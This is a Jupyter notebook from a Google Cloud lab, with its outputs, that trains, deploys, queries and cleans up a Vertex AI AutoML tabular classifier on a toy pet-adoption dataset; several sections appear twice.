/opt/conda/lib/python3.7/site-packages/ipykernel/ipkernel.py:283: DeprecationWarning: `should_run_async` will not call `transform_cell` automatically in the future. Please pass the result to `transformed_cell` argument and any exception that happen during thetransform in `preprocessing_exc_tuple` in IPython 7.17 and above.
and should_run_async(code)
###Markdown
Undeploy the modelTo undeploy your `Model` resource from the serving `Endpoint` resource, use the endpoint's `undeploy` method with the following parameter:- `deployed_model_id`: The model deployment identifier returned by the prediction service when the `Model` resource is deployed. You can retrieve the `deployed_model_id` using the prediction object's `deployed_model_id` property.
###Code
# TODO 5
# Undeploy the model resource
endpoint.undeploy(deployed_model_id=prediction.deployed_model_id)
###Output
INFO:google.cloud.aiplatform.models:Undeploying Endpoint model: projects/1075205415941/locations/us-central1/endpoints/7467372802459303936
###Markdown
Cleaning upTo clean up all Google Cloud resources used in this project, you can [delete the Google Cloud project](https://cloud.google.com/resource-manager/docs/creating-managing-projectsshutting_down_projects) you used for the tutorial.Otherwise, you can delete the individual resources you created in this tutorial:- Training Job- Model- Endpoint- Cloud Storage Bucket**Note**: You must delete any `Model` resources deployed to the `Endpoint` resource before deleting the `Endpoint` resource.
###Code
delete_training_job = True
delete_model = True
delete_endpoint = True
# Warning: Setting this to true will delete everything in your bucket
delete_bucket = False
# Delete the training job
job.delete()
# Delete the model
model.delete()
# Delete the endpoint
endpoint.delete()
if delete_bucket and "BUCKET_NAME" in globals():
! gsutil -m rm -r $BUCKET_NAME
###Output
INFO:google.cloud.aiplatform.base:Deleting AutoMLTabularTrainingJob : projects/1075205415941/locations/us-central1/trainingPipelines/1715908841423503360
INFO:google.cloud.aiplatform.base:Delete AutoMLTabularTrainingJob backing LRO: projects/1075205415941/locations/us-central1/operations/5317466105709592576
INFO:google.cloud.aiplatform.base:AutoMLTabularTrainingJob deleted. . Resource name: projects/1075205415941/locations/us-central1/trainingPipelines/1715908841423503360
INFO:google.cloud.aiplatform.base:Deleting Model : projects/1075205415941/locations/us-central1/models/3676687718445744128
###Markdown
Vertex AI Model Builder SDK: AutoML Tabular Training and Prediction OverviewIn this notebook, you learn how to use the Vertex AI Python client library to train and deploy a tabular classification model for online prediction. Learning ObjectiveIn this notebook, you learn how to:* Create a Vertex AI model training job.* Train an AutoML tabular model.* Deploy the `model` resource to a serving `endpoint` resource.* Make a prediction by sending data.* Undeploy the `model` resource. IntroductionIn this notebook, you will use Vertex AI Python client library to train and make predictions on an AutoML model based on a tabular dataset. Alternatively, you can train and make predictions on models by using the gcloud command-line tool or by using the online Cloud Console.Each learning objective will correspond to a __TODO__ in this student lab notebook -- try to complete this notebook first and then review the [solution notebook](../solutions/automl-tabular-classification.ipynb). **Make sure to enable the Vertex AI API and Compute Engine API.** Installation
###Code
# Setup your dependencies
import os
# The Google Cloud Notebook product has specific requirements
IS_GOOGLE_CLOUD_NOTEBOOK = os.path.exists("/opt/deeplearning/metadata/env_version")
USER_FLAG = ""
# Google Cloud Notebook requires dependencies to be installed with '--user'
if IS_GOOGLE_CLOUD_NOTEBOOK:
USER_FLAG = "--user"
###Output
_____no_output_____
###Markdown
Install the latest version of the Vertex AI client library.Run the following command in your virtual environment to install the Vertex SDK for Python:
###Code
# Upgrade the specified package to the newest available version
! pip install {USER_FLAG} --upgrade google-cloud-aiplatform
###Output
Requirement already satisfied: google-cloud-aiplatform in /opt/conda/lib/python3.7/site-packages (1.1.1)
Collecting google-cloud-aiplatform
Downloading google_cloud_aiplatform-1.3.0-py2.py3-none-any.whl (1.3 MB)
[K |████████████████████████████████| 1.3 MB 7.6 MB/s eta 0:00:01
[?25hRequirement already satisfied: proto-plus>=1.10.1 in /opt/conda/lib/python3.7/site-packages (from google-cloud-aiplatform) (1.19.0)
Requirement already satisfied: google-cloud-bigquery<3.0.0dev,>=1.15.0 in /opt/conda/lib/python3.7/site-packages (from google-cloud-aiplatform) (2.23.2)
Requirement already satisfied: google-api-core[grpc]<3.0.0dev,>=1.26.0 in /opt/conda/lib/python3.7/site-packages (from google-cloud-aiplatform) (1.31.1)
Requirement already satisfied: google-cloud-storage<2.0.0dev,>=1.32.0 in /opt/conda/lib/python3.7/site-packages (from google-cloud-aiplatform) (1.41.1)
Requirement already satisfied: packaging>=14.3 in /opt/conda/lib/python3.7/site-packages (from google-cloud-aiplatform) (21.0)
Requirement already satisfied: googleapis-common-protos<2.0dev,>=1.6.0 in /opt/conda/lib/python3.7/site-packages (from google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (1.53.0)
Requirement already satisfied: protobuf>=3.12.0 in /opt/conda/lib/python3.7/site-packages (from google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (3.16.0)
Requirement already satisfied: six>=1.13.0 in /opt/conda/lib/python3.7/site-packages (from google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (1.16.0)
Requirement already satisfied: pytz in /opt/conda/lib/python3.7/site-packages (from google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (2021.1)
Requirement already satisfied: google-auth<2.0dev,>=1.25.0 in /opt/conda/lib/python3.7/site-packages (from google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (1.34.0)
Requirement already satisfied: requests<3.0.0dev,>=2.18.0 in /opt/conda/lib/python3.7/site-packages (from google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (2.25.1)
Requirement already satisfied: setuptools>=40.3.0 in /opt/conda/lib/python3.7/site-packages (from google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (49.6.0.post20210108)
Requirement already satisfied: grpcio<2.0dev,>=1.29.0 in /opt/conda/lib/python3.7/site-packages (from google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (1.38.1)
Requirement already satisfied: rsa<5,>=3.1.4 in /opt/conda/lib/python3.7/site-packages (from google-auth<2.0dev,>=1.25.0->google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (4.7.2)
Requirement already satisfied: cachetools<5.0,>=2.0.0 in /opt/conda/lib/python3.7/site-packages (from google-auth<2.0dev,>=1.25.0->google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (4.2.2)
Requirement already satisfied: pyasn1-modules>=0.2.1 in /opt/conda/lib/python3.7/site-packages (from google-auth<2.0dev,>=1.25.0->google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (0.2.7)
Requirement already satisfied: google-resumable-media<3.0dev,>=0.6.0 in /opt/conda/lib/python3.7/site-packages (from google-cloud-bigquery<3.0.0dev,>=1.15.0->google-cloud-aiplatform) (1.3.2)
Requirement already satisfied: google-cloud-core<3.0.0dev,>=1.4.1 in /opt/conda/lib/python3.7/site-packages (from google-cloud-bigquery<3.0.0dev,>=1.15.0->google-cloud-aiplatform) (1.7.2)
Requirement already satisfied: google-crc32c<2.0dev,>=1.0 in /opt/conda/lib/python3.7/site-packages (from google-resumable-media<3.0dev,>=0.6.0->google-cloud-bigquery<3.0.0dev,>=1.15.0->google-cloud-aiplatform) (1.1.2)
Requirement already satisfied: cffi>=1.0.0 in /opt/conda/lib/python3.7/site-packages (from google-crc32c<2.0dev,>=1.0->google-resumable-media<3.0dev,>=0.6.0->google-cloud-bigquery<3.0.0dev,>=1.15.0->google-cloud-aiplatform) (1.14.6)
Requirement already satisfied: pycparser in /opt/conda/lib/python3.7/site-packages (from cffi>=1.0.0->google-crc32c<2.0dev,>=1.0->google-resumable-media<3.0dev,>=0.6.0->google-cloud-bigquery<3.0.0dev,>=1.15.0->google-cloud-aiplatform) (2.20)
Requirement already satisfied: pyparsing>=2.0.2 in /opt/conda/lib/python3.7/site-packages (from packaging>=14.3->google-cloud-aiplatform) (2.4.7)
Requirement already satisfied: pyasn1<0.5.0,>=0.4.6 in /opt/conda/lib/python3.7/site-packages (from pyasn1-modules>=0.2.1->google-auth<2.0dev,>=1.25.0->google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (0.4.8)
Requirement already satisfied: certifi>=2017.4.17 in /opt/conda/lib/python3.7/site-packages (from requests<3.0.0dev,>=2.18.0->google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (2021.5.30)
Requirement already satisfied: urllib3<1.27,>=1.21.1 in /opt/conda/lib/python3.7/site-packages (from requests<3.0.0dev,>=2.18.0->google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (1.26.6)
Requirement already satisfied: chardet<5,>=3.0.2 in /opt/conda/lib/python3.7/site-packages (from requests<3.0.0dev,>=2.18.0->google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (4.0.0)
Requirement already satisfied: idna<3,>=2.5 in /opt/conda/lib/python3.7/site-packages (from requests<3.0.0dev,>=2.18.0->google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (2.10)
Installing collected packages: google-cloud-aiplatform
[33m WARNING: The script tb-gcp-uploader is installed in '/home/jupyter/.local/bin' which is not on PATH.
Consider adding this directory to PATH or, if you prefer to suppress this warning, use --no-warn-script-location.[0m
Successfully installed google-cloud-aiplatform-1.3.0
###Markdown
Install the Cloud Storage library:
###Code
# Upgrade the specified package to the newest available version
! pip install {USER_FLAG} --upgrade google-cloud-storage
###Output
Requirement already satisfied: google-cloud-storage in /opt/conda/lib/python3.7/site-packages (1.41.1)
Collecting google-cloud-storage
Downloading google_cloud_storage-1.42.0-py2.py3-none-any.whl (105 kB)
[K |████████████████████████████████| 105 kB 8.1 MB/s eta 0:00:01
[?25hRequirement already satisfied: google-resumable-media<3.0dev,>=1.3.0 in /opt/conda/lib/python3.7/site-packages (from google-cloud-storage) (1.3.2)
Requirement already satisfied: google-auth<3.0dev,>=1.25.0 in /opt/conda/lib/python3.7/site-packages (from google-cloud-storage) (1.34.0)
Requirement already satisfied: google-cloud-core<3.0dev,>=1.6.0 in /opt/conda/lib/python3.7/site-packages (from google-cloud-storage) (1.7.2)
Requirement already satisfied: google-api-core<3.0dev,>=1.29.0 in /opt/conda/lib/python3.7/site-packages (from google-cloud-storage) (1.31.1)
Requirement already satisfied: requests<3.0.0dev,>=2.18.0 in /opt/conda/lib/python3.7/site-packages (from google-cloud-storage) (2.25.1)
Requirement already satisfied: packaging>=14.3 in /opt/conda/lib/python3.7/site-packages (from google-api-core<3.0dev,>=1.29.0->google-cloud-storage) (21.0)
Requirement already satisfied: protobuf>=3.12.0 in /opt/conda/lib/python3.7/site-packages (from google-api-core<3.0dev,>=1.29.0->google-cloud-storage) (3.16.0)
Requirement already satisfied: six>=1.13.0 in /opt/conda/lib/python3.7/site-packages (from google-api-core<3.0dev,>=1.29.0->google-cloud-storage) (1.16.0)
Requirement already satisfied: pytz in /opt/conda/lib/python3.7/site-packages (from google-api-core<3.0dev,>=1.29.0->google-cloud-storage) (2021.1)
Requirement already satisfied: googleapis-common-protos<2.0dev,>=1.6.0 in /opt/conda/lib/python3.7/site-packages (from google-api-core<3.0dev,>=1.29.0->google-cloud-storage) (1.53.0)
Requirement already satisfied: setuptools>=40.3.0 in /opt/conda/lib/python3.7/site-packages (from google-api-core<3.0dev,>=1.29.0->google-cloud-storage) (49.6.0.post20210108)
Requirement already satisfied: cachetools<5.0,>=2.0.0 in /opt/conda/lib/python3.7/site-packages (from google-auth<3.0dev,>=1.25.0->google-cloud-storage) (4.2.2)
Requirement already satisfied: pyasn1-modules>=0.2.1 in /opt/conda/lib/python3.7/site-packages (from google-auth<3.0dev,>=1.25.0->google-cloud-storage) (0.2.7)
Requirement already satisfied: rsa<5,>=3.1.4 in /opt/conda/lib/python3.7/site-packages (from google-auth<3.0dev,>=1.25.0->google-cloud-storage) (4.7.2)
Requirement already satisfied: google-crc32c<2.0dev,>=1.0 in /opt/conda/lib/python3.7/site-packages (from google-resumable-media<3.0dev,>=1.3.0->google-cloud-storage) (1.1.2)
Requirement already satisfied: cffi>=1.0.0 in /opt/conda/lib/python3.7/site-packages (from google-crc32c<2.0dev,>=1.0->google-resumable-media<3.0dev,>=1.3.0->google-cloud-storage) (1.14.6)
Requirement already satisfied: pycparser in /opt/conda/lib/python3.7/site-packages (from cffi>=1.0.0->google-crc32c<2.0dev,>=1.0->google-resumable-media<3.0dev,>=1.3.0->google-cloud-storage) (2.20)
Requirement already satisfied: pyparsing>=2.0.2 in /opt/conda/lib/python3.7/site-packages (from packaging>=14.3->google-api-core<3.0dev,>=1.29.0->google-cloud-storage) (2.4.7)
Requirement already satisfied: pyasn1<0.5.0,>=0.4.6 in /opt/conda/lib/python3.7/site-packages (from pyasn1-modules>=0.2.1->google-auth<3.0dev,>=1.25.0->google-cloud-storage) (0.4.8)
Requirement already satisfied: urllib3<1.27,>=1.21.1 in /opt/conda/lib/python3.7/site-packages (from requests<3.0.0dev,>=2.18.0->google-cloud-storage) (1.26.6)
Requirement already satisfied: idna<3,>=2.5 in /opt/conda/lib/python3.7/site-packages (from requests<3.0.0dev,>=2.18.0->google-cloud-storage) (2.10)
Requirement already satisfied: certifi>=2017.4.17 in /opt/conda/lib/python3.7/site-packages (from requests<3.0.0dev,>=2.18.0->google-cloud-storage) (2021.5.30)
Requirement already satisfied: chardet<5,>=3.0.2 in /opt/conda/lib/python3.7/site-packages (from requests<3.0.0dev,>=2.18.0->google-cloud-storage) (4.0.0)
Installing collected packages: google-cloud-storage
Successfully installed google-cloud-storage-1.42.0
###Markdown
Restart the kernelAfter you install the additional packages, you need to restart the notebook kernel so it can find the packages.
###Code
# Automatically restart kernel after installs
import os
if not os.getenv("IS_TESTING"):
# Automatically restart kernel after installs
import IPython
app = IPython.Application.instance()
app.kernel.do_shutdown(True)
###Output
_____no_output_____
###Markdown
Set your project ID**If you don't know your project ID**, you may be able to get your project ID using `gcloud`.
###Code
import os
PROJECT_ID = ""
# Get your Google Cloud project ID from gcloud
if not os.getenv("IS_TESTING"):
shell_output=!gcloud config list --format 'value(core.project)' 2>/dev/null
PROJECT_ID = shell_output[0]
print("Project ID: ", PROJECT_ID)
###Output
Project ID: qwiklabs-gcp-04-c846b6079446
###Markdown
Otherwise, set your project ID here.
###Code
if PROJECT_ID == "" or PROJECT_ID is None:
PROJECT_ID = "qwiklabs-gcp-04-c846b6079446" # @param {type:"string"}
###Output
_____no_output_____
###Markdown
TimestampIf you are in a live tutorial session, you might be using a shared test account or project. To avoid name collisions between users on resources created, you create a timestamp for each instance session, and append it onto the name of resources you create in this tutorial.
###Code
# Import necessary libraries
from datetime import datetime
# Use a timestamp to ensure unique resources
TIMESTAMP = datetime.now().strftime("%Y%m%d%H%M%S")
###Output
_____no_output_____
###Markdown
Create a Cloud Storage bucket**The following steps are required, regardless of your notebook environment.**This notebook demonstrates how to use Model Builder SDK to create an AutoML model based on a tabular dataset. You will need to provide a Cloud Storage bucket where the dataset will be stored.Set the name of your Cloud Storage bucket below. It must be unique across all of your Cloud Storage buckets.You may also change the `REGION` variable, which is used for operationsthroughout the rest of this notebook. Make sure to [choose a region where Vertex AI services areavailable](https://cloud.google.com/vertex-ai/docs/general/locations). You maynot use a Multi-Regional Storage bucket for training with Vertex AI.
###Code
BUCKET_NAME = "gs://qwiklabs-gcp-04-c846b6079446" # @param {type:"string"}
REGION = "us-central1" # @param {type:"string"}
if BUCKET_NAME == "" or BUCKET_NAME is None or BUCKET_NAME == "gs://qwiklabs-gcp-04-c846b6079446":
BUCKET_NAME = "gs://" + PROJECT_ID + "aip-" + TIMESTAMP
###Output
_____no_output_____
###Markdown
**Only if your bucket doesn't already exist**: Run the following cell to create your Cloud Storage bucket.
###Code
! gsutil mb -l $REGION $BUCKET_NAME
###Output
Creating gs://qwiklabs-gcp-04-c846b6079446aip-20210826051658/...
###Markdown
Finally, validate access to your Cloud Storage bucket by examining its contents:
###Code
! gsutil ls -al $BUCKET_NAME
###Output
_____no_output_____
###Markdown
Copy dataset into your Cloud Storage bucket
###Code
IMPORT_FILE = "petfinder-tabular-classification_toy.csv"
! gsutil cp gs://cloud-training/mlongcp/v3.0_MLonGC/toy_data/{IMPORT_FILE} {BUCKET_NAME}/data/
gcs_source = f"{BUCKET_NAME}/data/{IMPORT_FILE}"
###Output
Copying gs://cloud-training/mlongcp/v3.0_MLonGC/toy_data/petfinder-tabular-classification_toy.csv [Content-Type=text/csv]...
[1 files][378.2 KiB/378.2 KiB]
Operation completed over 1 objects/378.2 KiB.
###Markdown
Import Vertex SDK for PythonImport the Vertex SDK into your Python environment and initialize it.
###Code
# Import necessary libraries
import os
from google.cloud import aiplatform
aiplatform.init(project=PROJECT_ID, location=REGION)
###Output
_____no_output_____
###Markdown
TutorialNow you are ready to create your AutoML Tabular model. Create a Managed Tabular Dataset from a CSVThis section will create a dataset from a CSV file stored on your GCS bucket.
###Code
ds = dataset = aiplatform.TabularDataset.create(
display_name="petfinder-tabular-dataset",
gcs_source=gcs_source,
)
ds.resource_name
###Output
INFO:google.cloud.aiplatform.datasets.dataset:Creating TabularDataset
INFO:google.cloud.aiplatform.datasets.dataset:Create TabularDataset backing LRO: projects/1075205415941/locations/us-central1/datasets/1945247175768276992/operations/1110822578768838656
INFO:google.cloud.aiplatform.datasets.dataset:TabularDataset created. Resource name: projects/1075205415941/locations/us-central1/datasets/1945247175768276992
INFO:google.cloud.aiplatform.datasets.dataset:To use this TabularDataset in another session:
INFO:google.cloud.aiplatform.datasets.dataset:ds = aiplatform.TabularDataset('projects/1075205415941/locations/us-central1/datasets/1945247175768276992')
###Markdown
Launch a Training Job to Create a ModelOnce we have defined your training script, we will create a model. The `run` function creates a training pipeline that trains and creates a `Model` object. After the training pipeline completes, the `run` function returns the `Model` object.
###Code
# TODO 1
# Constructs a AutoML Tabular Training Job
job = aiplatform.AutoMLTabularTrainingJob(
display_name="train-petfinder-automl-1",
optimization_prediction_type="classification",
column_transformations=[
{"categorical": {"column_name": "Type"}},
{"numeric": {"column_name": "Age"}},
{"categorical": {"column_name": "Breed1"}},
{"categorical": {"column_name": "Color1"}},
{"categorical": {"column_name": "Color2"}},
{"categorical": {"column_name": "MaturitySize"}},
{"categorical": {"column_name": "FurLength"}},
{"categorical": {"column_name": "Vaccinated"}},
{"categorical": {"column_name": "Sterilized"}},
{"categorical": {"column_name": "Health"}},
{"numeric": {"column_name": "Fee"}},
{"numeric": {"column_name": "PhotoAmt"}},
],
)
# TODO 2a
# Create and train the model object
# This will take around two hour and half to run
model = job.run(
dataset=ds,
target_column="Adopted",
# TODO 2b
# Define training, validation and test fraction for training
training_fraction_split=0.8,
validation_fraction_split=0.1,
test_fraction_split=0.1,
model_display_name="adopted-prediction-model",
disable_early_stopping=False,
)
###Output
/opt/conda/lib/python3.7/site-packages/ipykernel/ipkernel.py:283: DeprecationWarning: `should_run_async` will not call `transform_cell` automatically in the future. Please pass the result to `transformed_cell` argument and any exception that happen during thetransform in `preprocessing_exc_tuple` in IPython 7.17 and above.
and should_run_async(code)
/opt/conda/lib/python3.7/site-packages/ipykernel_launcher.py:16: DeprecationWarning: consider using column_specs instead. column_transformations will be deprecated in the future.
app.launch_new_instance()
###Markdown
Deploy your modelBefore you use your model to make predictions, you need to deploy it to an `Endpoint`. You can do this by calling the `deploy` function on the `Model` resource. This function does two things:1. Creates an `Endpoint` resource to which the `Model` resource will be deployed.2. Deploys the `Model` resource to the `Endpoint` resource.Deploy your model. NOTE: Wait until the model **FINISHES** deployment before proceeding to prediction.
###Code
# TODO 3
# Deploy the model resource to the serving endpoint resource
endpoint = model.deploy(
machine_type="n1-standard-4",
)
###Output
/opt/conda/lib/python3.7/site-packages/ipykernel/ipkernel.py:283: DeprecationWarning: `should_run_async` will not call `transform_cell` automatically in the future. Please pass the result to `transformed_cell` argument and any exception that happen during thetransform in `preprocessing_exc_tuple` in IPython 7.17 and above.
and should_run_async(code)
###Markdown
Predict on the endpoint * This sample instance is taken from an observation in which `Adopted` = **Yes*** Note that the values are all strings. Since the original data was in CSV format, everything is treated as a string. The transformations you defined when creating your `AutoMLTabularTrainingJob` inform Vertex AI to transform the inputs to their defined types.
###Code
# TODO 4
# Make a prediction using the sample values
prediction = endpoint.predict(
[
{
"Type": "Cat",
"Age": "3",
"Breed1": "Tabby",
"Gender": "Male",
"Color1": "Black",
"Color2": "White",
"MaturitySize": "Small",
"FurLength": "Short",
"Vaccinated": "No",
"Sterilized": "No",
"Health": "Healthy",
"Fee": "100",
"PhotoAmt": "2",
}
]
)
print(prediction)
###Output
/opt/conda/lib/python3.7/site-packages/ipykernel/ipkernel.py:283: DeprecationWarning: `should_run_async` will not call `transform_cell` automatically in the future. Please pass the result to `transformed_cell` argument and any exception that happen during thetransform in `preprocessing_exc_tuple` in IPython 7.17 and above.
and should_run_async(code)
###Markdown
Undeploy the modelTo undeploy your `Model` resource from the serving `Endpoint` resource, use the endpoint's `undeploy` method with the following parameter:- `deployed_model_id`: The model deployment identifier returned by the prediction service when the `Model` resource is deployed. You can retrieve the `deployed_model_id` using the prediction object's `deployed_model_id` property.
###Code
# TODO 5
# Undeploy the model resource
endpoint.undeploy(deployed_model_id=prediction.deployed_model_id)
###Output
INFO:google.cloud.aiplatform.models:Undeploying Endpoint model: projects/1075205415941/locations/us-central1/endpoints/7467372802459303936
###Markdown
Cleaning upTo clean up all Google Cloud resources used in this project, you can [delete the Google Cloud project](https://cloud.google.com/resource-manager/docs/creating-managing-projectsshutting_down_projects) you used for the tutorial.Otherwise, you can delete the individual resources you created in this tutorial:- Training Job- Model- Endpoint- Cloud Storage Bucket**Note**: You must delete any `Model` resources deployed to the `Endpoint` resource before deleting the `Endpoint` resource.
###Code
delete_training_job = True
delete_model = True
delete_endpoint = True
# Warning: Setting this to true will delete everything in your bucket
delete_bucket = False
# Delete the training job
job.delete()
# Delete the model
model.delete()
# Delete the endpoint
endpoint.delete()
if delete_bucket and "BUCKET_NAME" in globals():
! gsutil -m rm -r $BUCKET_NAME
###Output
INFO:google.cloud.aiplatform.base:Deleting AutoMLTabularTrainingJob : projects/1075205415941/locations/us-central1/trainingPipelines/1715908841423503360
INFO:google.cloud.aiplatform.base:Delete AutoMLTabularTrainingJob backing LRO: projects/1075205415941/locations/us-central1/operations/5317466105709592576
INFO:google.cloud.aiplatform.base:AutoMLTabularTrainingJob deleted. . Resource name: projects/1075205415941/locations/us-central1/trainingPipelines/1715908841423503360
INFO:google.cloud.aiplatform.base:Deleting Model : projects/1075205415941/locations/us-central1/models/3676687718445744128
###Markdown
Vertex AI Model Builder SDK: AutoML Tabular Training and Prediction OverviewIn this notebook, you learn how to use the Vertex AI Python client library to train and deploy a tabular classification model for online prediction. Learning ObjectiveIn this notebook, you learn how to:* Create a Vertex AI model training job.* Train an AutoML tabular model.* Deploy the `model` resource to a serving `endpoint` resource.* Make a prediction by sending data.* Undeploy the `model` resource. IntroductionIn this notebook, you will use Vertex AI Python client library to train and make predictions on an AutoML model based on a tabular dataset. Alternatively, you can train and make predictions on models by using the gcloud command-line tool or by using the online Cloud Console.Each learning objective will correspond to a __TODO__ in this student lab notebook -- try to complete this notebook first and then review the [solution notebook](../solutions/automl-tabular-classification.ipynb). **Make sure to enable the Vertex AI API and Compute Engine API.** Installation
###Code
# Setup your dependencies
import os
# The Google Cloud Notebook product has specific requirements
IS_GOOGLE_CLOUD_NOTEBOOK = os.path.exists("/opt/deeplearning/metadata/env_version")
USER_FLAG = ""
# Google Cloud Notebook requires dependencies to be installed with '--user'
if IS_GOOGLE_CLOUD_NOTEBOOK:
USER_FLAG = "--user"
###Output
_____no_output_____
###Markdown
Install the latest version of the Vertex AI client library.Run the following command in your virtual environment to install the Vertex SDK for Python:
###Code
# Upgrade the specified package to the newest available version
! pip install {USER_FLAG} --upgrade google-cloud-aiplatform
###Output
Requirement already satisfied: google-cloud-aiplatform in /opt/conda/lib/python3.7/site-packages (1.1.1)
Collecting google-cloud-aiplatform
Downloading google_cloud_aiplatform-1.3.0-py2.py3-none-any.whl (1.3 MB)
[K |████████████████████████████████| 1.3 MB 7.6 MB/s eta 0:00:01
[?25hRequirement already satisfied: proto-plus>=1.10.1 in /opt/conda/lib/python3.7/site-packages (from google-cloud-aiplatform) (1.19.0)
Requirement already satisfied: google-cloud-bigquery<3.0.0dev,>=1.15.0 in /opt/conda/lib/python3.7/site-packages (from google-cloud-aiplatform) (2.23.2)
Requirement already satisfied: google-api-core[grpc]<3.0.0dev,>=1.26.0 in /opt/conda/lib/python3.7/site-packages (from google-cloud-aiplatform) (1.31.1)
Requirement already satisfied: google-cloud-storage<2.0.0dev,>=1.32.0 in /opt/conda/lib/python3.7/site-packages (from google-cloud-aiplatform) (1.41.1)
Requirement already satisfied: packaging>=14.3 in /opt/conda/lib/python3.7/site-packages (from google-cloud-aiplatform) (21.0)
Requirement already satisfied: googleapis-common-protos<2.0dev,>=1.6.0 in /opt/conda/lib/python3.7/site-packages (from google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (1.53.0)
Requirement already satisfied: protobuf>=3.12.0 in /opt/conda/lib/python3.7/site-packages (from google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (3.16.0)
Requirement already satisfied: six>=1.13.0 in /opt/conda/lib/python3.7/site-packages (from google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (1.16.0)
Requirement already satisfied: pytz in /opt/conda/lib/python3.7/site-packages (from google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (2021.1)
Requirement already satisfied: google-auth<2.0dev,>=1.25.0 in /opt/conda/lib/python3.7/site-packages (from google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (1.34.0)
Requirement already satisfied: requests<3.0.0dev,>=2.18.0 in /opt/conda/lib/python3.7/site-packages (from google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (2.25.1)
Requirement already satisfied: setuptools>=40.3.0 in /opt/conda/lib/python3.7/site-packages (from google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (49.6.0.post20210108)
Requirement already satisfied: grpcio<2.0dev,>=1.29.0 in /opt/conda/lib/python3.7/site-packages (from google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (1.38.1)
Requirement already satisfied: rsa<5,>=3.1.4 in /opt/conda/lib/python3.7/site-packages (from google-auth<2.0dev,>=1.25.0->google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (4.7.2)
Requirement already satisfied: cachetools<5.0,>=2.0.0 in /opt/conda/lib/python3.7/site-packages (from google-auth<2.0dev,>=1.25.0->google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (4.2.2)
Requirement already satisfied: pyasn1-modules>=0.2.1 in /opt/conda/lib/python3.7/site-packages (from google-auth<2.0dev,>=1.25.0->google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (0.2.7)
Requirement already satisfied: google-resumable-media<3.0dev,>=0.6.0 in /opt/conda/lib/python3.7/site-packages (from google-cloud-bigquery<3.0.0dev,>=1.15.0->google-cloud-aiplatform) (1.3.2)
Requirement already satisfied: google-cloud-core<3.0.0dev,>=1.4.1 in /opt/conda/lib/python3.7/site-packages (from google-cloud-bigquery<3.0.0dev,>=1.15.0->google-cloud-aiplatform) (1.7.2)
Requirement already satisfied: google-crc32c<2.0dev,>=1.0 in /opt/conda/lib/python3.7/site-packages (from google-resumable-media<3.0dev,>=0.6.0->google-cloud-bigquery<3.0.0dev,>=1.15.0->google-cloud-aiplatform) (1.1.2)
Requirement already satisfied: cffi>=1.0.0 in /opt/conda/lib/python3.7/site-packages (from google-crc32c<2.0dev,>=1.0->google-resumable-media<3.0dev,>=0.6.0->google-cloud-bigquery<3.0.0dev,>=1.15.0->google-cloud-aiplatform) (1.14.6)
Requirement already satisfied: pycparser in /opt/conda/lib/python3.7/site-packages (from cffi>=1.0.0->google-crc32c<2.0dev,>=1.0->google-resumable-media<3.0dev,>=0.6.0->google-cloud-bigquery<3.0.0dev,>=1.15.0->google-cloud-aiplatform) (2.20)
Requirement already satisfied: pyparsing>=2.0.2 in /opt/conda/lib/python3.7/site-packages (from packaging>=14.3->google-cloud-aiplatform) (2.4.7)
Requirement already satisfied: pyasn1<0.5.0,>=0.4.6 in /opt/conda/lib/python3.7/site-packages (from pyasn1-modules>=0.2.1->google-auth<2.0dev,>=1.25.0->google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (0.4.8)
Requirement already satisfied: certifi>=2017.4.17 in /opt/conda/lib/python3.7/site-packages (from requests<3.0.0dev,>=2.18.0->google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (2021.5.30)
Requirement already satisfied: urllib3<1.27,>=1.21.1 in /opt/conda/lib/python3.7/site-packages (from requests<3.0.0dev,>=2.18.0->google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (1.26.6)
Requirement already satisfied: chardet<5,>=3.0.2 in /opt/conda/lib/python3.7/site-packages (from requests<3.0.0dev,>=2.18.0->google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (4.0.0)
Requirement already satisfied: idna<3,>=2.5 in /opt/conda/lib/python3.7/site-packages (from requests<3.0.0dev,>=2.18.0->google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (2.10)
Installing collected packages: google-cloud-aiplatform
[33m WARNING: The script tb-gcp-uploader is installed in '/home/jupyter/.local/bin' which is not on PATH.
Consider adding this directory to PATH or, if you prefer to suppress this warning, use --no-warn-script-location.[0m
Successfully installed google-cloud-aiplatform-1.3.0
###Markdown
Install the Cloud Storage library:
###Code
# Upgrade the specified package to the newest available version
! pip install {USER_FLAG} --upgrade google-cloud-storage
